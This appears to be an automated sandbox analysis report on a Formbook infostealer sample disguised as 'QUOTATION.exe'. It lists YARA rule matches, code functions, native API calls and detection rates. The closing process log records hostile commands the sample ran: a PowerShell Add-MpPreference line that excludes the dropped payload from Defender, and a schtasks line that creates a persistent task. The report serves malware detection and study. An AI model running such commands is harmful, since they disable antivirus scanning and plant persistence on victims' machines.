Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00DAE778 1_2_00DAE778
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00DAE76B 1_2_00DAE76B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00DABDC4 1_2_00DABDC4
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 1_2_00362050 1_2_00362050
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 13_2_00332050 13_2_00332050
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00401030 17_2_00401030
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041E887 17_2_0041E887
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041D969 17_2_0041D969
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00402D90 17_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00409E5B 17_2_00409E5B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00409E60 17_2_00409E60
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041DFCE 17_2_0041DFCE
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00402FB0 17_2_00402FB0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FEB090 17_2_00FEB090
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFA830 17_2_00FFA830
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01091002 17_2_01091002
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010AE824 17_2_010AE824
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF99BF 17_2_00FF99BF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010020A0 17_2_010020A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A20A8 17_2_010A20A8
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF4120 17_2_00FF4120
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A28EC 17_2_010A28EC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDF900 17_2_00FDF900
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A2B28 17_2_010A2B28
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0107CB4F 17_2_0107CB4F
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100138B 17_2_0100138B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100EBB0 17_2_0100EBB0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010903DA 17_2_010903DA
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100ABD8 17_2_0100ABD8
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109DBD2 17_2_0109DBD2
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010823E3 17_2_010823E3
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0108FA2B 17_2_0108FA2B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A22AE 17_2_010A22AE
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAB40 17_2_00FFAB40
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01094AEF 17_2_01094AEF
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFA309 17_2_00FFA309
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A2D07 17_2_010A2D07
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A1D55 17_2_010A1D55
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002581 17_2_01002581
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB477 17_2_00FFB477
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01092D82 17_2_01092D82
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A25DD 17_2_010A25DD
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE841F 17_2_00FE841F
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FED5E0 17_2_00FED5E0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109D466 17_2_0109D466
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01094496 17_2_01094496
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD0D20 17_2_00FD0D20
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010ADFCE 17_2_010ADFCE
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF6E30 17_2_00FF6E30
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A1FF1 17_2_010A1FF1
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109D616 17_2_0109D616
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A2EF7 17_2_010A2EF7
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00522050 17_2_00522050
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03312B28 24_2_03312B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326AB40 24_2_0326AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327EBB0 24_2_0327EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032F23E3 24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330DBD2 24_2_0330DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_033003DA 24_2_033003DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327ABD8 24_2_0327ABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032FFA2B 24_2_032FFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_033122AE 24_2_033122AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324F900 24_2_0324F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032699BF 24_2_032699BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0331E824 24_2_0331E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A830 24_2_0326A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03301002 24_2_03301002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032720A0 24_2_032720A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_033120A8 24_2_033120A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0325B090 24_2_0325B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_033128EC 24_2_033128EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03311FF1 24_2_03311FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0331DFCE 24_2_0331DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03266E30 24_2_03266E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330D616 24_2_0330D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03312EF7 24_2_03312EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03240D20 24_2_03240D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03312D07 24_2_03312D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03311D55 24_2_03311D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03272581 24_2_03272581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03302D82 24_2_03302D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0325D5E0 24_2_0325D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_033125DD 24_2_033125DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0325841F 24_2_0325841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330D466 24_2_0330D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304496 24_2_03304496
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074E887 24_2_0074E887
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00732D90 24_2_00732D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00739E60 24_2_00739E60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00739E5B 24_2_00739E5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_00732FB0 24_2_00732FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0324B150 appears 133 times
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: String function: 00FDB150 appears 136 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A360 NtCreateFile, 17_2_0041A360
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A410 NtReadFile, 17_2_0041A410
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A490 NtClose, 17_2_0041A490
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A540 NtAllocateVirtualMemory, 17_2_0041A540
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A35B NtCreateFile, 17_2_0041A35B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A40A NtReadFile, 17_2_0041A40A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A48A NtClose, 17_2_0041A48A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0041A53C NtAllocateVirtualMemory, 17_2_0041A53C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_01019910
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010199A0 NtCreateSection,LdrInitializeThunk, 17_2_010199A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019840 NtDelayExecution,LdrInitializeThunk, 17_2_01019840
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_01019860
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010198F0 NtReadVirtualMemory,LdrInitializeThunk, 17_2_010198F0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019A00 NtProtectVirtualMemory,LdrInitializeThunk, 17_2_01019A00
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019A20 NtResumeThread,LdrInitializeThunk, 17_2_01019A20
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019A50 NtCreateFile,LdrInitializeThunk, 17_2_01019A50
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019540 NtReadFile,LdrInitializeThunk, 17_2_01019540
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010195D0 NtClose,LdrInitializeThunk, 17_2_010195D0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019710 NtQueryInformationToken,LdrInitializeThunk, 17_2_01019710
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019780 NtMapViewOfSection,LdrInitializeThunk, 17_2_01019780
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010197A0 NtUnmapViewOfSection,LdrInitializeThunk, 17_2_010197A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_01019660
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010196E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_010196E0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019950 NtQueueApcThread, 17_2_01019950
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010199D0 NtCreateProcessEx, 17_2_010199D0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019820 NtEnumerateKey, 17_2_01019820
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101B040 NtSuspendThread, 17_2_0101B040
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010198A0 NtWriteVirtualMemory, 17_2_010198A0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019B00 NtSetValueKey, 17_2_01019B00
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101A3B0 NtGetContextThread, 17_2_0101A3B0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019A10 NtQuerySection, 17_2_01019A10
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019A80 NtOpenDirectoryObject, 17_2_01019A80
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019520 NtWaitForSingleObject, 17_2_01019520
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101AD30 NtSetContextThread, 17_2_0101AD30
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019560 NtWriteFile, 17_2_01019560
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010195F0 NtQueryInformationFile, 17_2_010195F0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101A710 NtOpenProcessToken, 17_2_0101A710
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019730 NtQueryVirtualMemory, 17_2_01019730
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019760 NtOpenProcess, 17_2_01019760
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0101A770 NtOpenThread, 17_2_0101A770
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019770 NtSetInformationFile, 17_2_01019770
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019FE0 NtCreateMutant, 17_2_01019FE0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019610 NtEnumerateValueKey, 17_2_01019610
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019650 NtQueryValueKey, 17_2_01019650
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01019670 NtQueryInformationProcess, 17_2_01019670
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010196D0 NtCreateKey, 17_2_010196D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289A50 NtCreateFile,LdrInitializeThunk, 24_2_03289A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_03289910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032899A0 NtCreateSection,LdrInitializeThunk, 24_2_032899A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_03289860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289840 NtDelayExecution,LdrInitializeThunk, 24_2_03289840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289710 NtQueryInformationToken,LdrInitializeThunk, 24_2_03289710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289780 NtMapViewOfSection,LdrInitializeThunk, 24_2_03289780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289FE0 NtCreateMutant,LdrInitializeThunk, 24_2_03289FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_03289660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289650 NtQueryValueKey,LdrInitializeThunk, 24_2_03289650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032896E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_032896E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032896D0 NtCreateKey,LdrInitializeThunk, 24_2_032896D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289540 NtReadFile,LdrInitializeThunk, 24_2_03289540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032895D0 NtClose,LdrInitializeThunk, 24_2_032895D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289B00 NtSetValueKey, 24_2_03289B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328A3B0 NtGetContextThread, 24_2_0328A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289A20 NtResumeThread, 24_2_03289A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289A00 NtProtectVirtualMemory, 24_2_03289A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289A10 NtQuerySection, 24_2_03289A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289A80 NtOpenDirectoryObject, 24_2_03289A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289950 NtQueueApcThread, 24_2_03289950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032899D0 NtCreateProcessEx, 24_2_032899D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289820 NtEnumerateKey, 24_2_03289820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328B040 NtSuspendThread, 24_2_0328B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032898A0 NtWriteVirtualMemory, 24_2_032898A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032898F0 NtReadVirtualMemory, 24_2_032898F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289730 NtQueryVirtualMemory, 24_2_03289730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328A710 NtOpenProcessToken, 24_2_0328A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289760 NtOpenProcess, 24_2_03289760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328A770 NtOpenThread, 24_2_0328A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289770 NtSetInformationFile, 24_2_03289770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032897A0 NtUnmapViewOfSection, 24_2_032897A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289610 NtEnumerateValueKey, 24_2_03289610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289670 NtQueryInformationProcess, 24_2_03289670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289520 NtWaitForSingleObject, 24_2_03289520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328AD30 NtSetContextThread, 24_2_0328AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03289560 NtWriteFile, 24_2_03289560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032895F0 NtQueryInformationFile, 24_2_032895F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A360 NtCreateFile, 24_2_0074A360
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A410 NtReadFile, 24_2_0074A410
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A490 NtClose, 24_2_0074A490
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A540 NtAllocateVirtualMemory, 24_2_0074A540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A35B NtCreateFile, 24_2_0074A35B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A40A NtReadFile, 24_2_0074A40A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A48A NtClose, 24_2_0074A48A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0074A53C NtAllocateVirtualMemory, 24_2_0074A53C
Sample file is different than original file name gathered from version info
Source: QUOTATION.exe, 00000001.00000002.297891578.000000000040A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.302035905.00000000059B0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000003.287892144.00000000037E4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs QUOTATION.exe
Source: QUOTATION.exe, 0000000D.00000000.290403933.00000000003DA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378944407.000000000125F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000000.296533989.00000000005CA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs QUOTATION.exe
Source: QUOTATION.exe Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: lQdAGavApIJoo.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: QUOTATION.exe Virustotal: Detection: 40%
Source: QUOTATION.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\QUOTATION.exe File read: C:\Users\user\Desktop\QUOTATION.exe
Source: QUOTATION.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\QUOTATION.exe "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
